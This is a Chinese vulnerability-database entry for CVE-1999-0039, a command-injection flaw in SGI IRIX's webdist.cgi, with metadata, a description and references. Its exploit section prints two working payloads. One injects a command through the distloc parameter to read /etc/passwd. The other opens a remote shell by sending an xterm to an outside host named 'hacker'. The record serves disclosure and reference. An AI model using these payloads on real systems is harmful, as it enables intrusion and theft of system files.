IRIX cgi-bin webdist.cgi 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105294 漏洞类型 输入验证
发布时间 1997-05-06 更新时间 2006-11-16
CVE编号 CVE-1999-0039 CNNVD-ID CNNVD-199705-006
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19299
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-006
|漏洞详情
SGIIRIX上的webdistCGI程序(webdist.cgi)存在漏洞。远程攻击者可以通过distloc参数中的shell元字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/374/info


A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon.

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

or

http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
|参考资料

来源:CERT/CCAdvisory:CA-1997-12
名称:CA-1997-12
链接:http://www.cert.org/advisories/CA-1997-12.html
来源:XF
名称:http-sgi-webdist(333)
链接:http://xforce.iss.net/xforce/xfdb/333
来源:BID
名称:374
链接:http://www.securityfocus.com/bid/374
来源:OSVDB
名称:235
链接:http://www.osvdb.org/235
来源:SGI
名称:19970501-02-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19970501-02-PX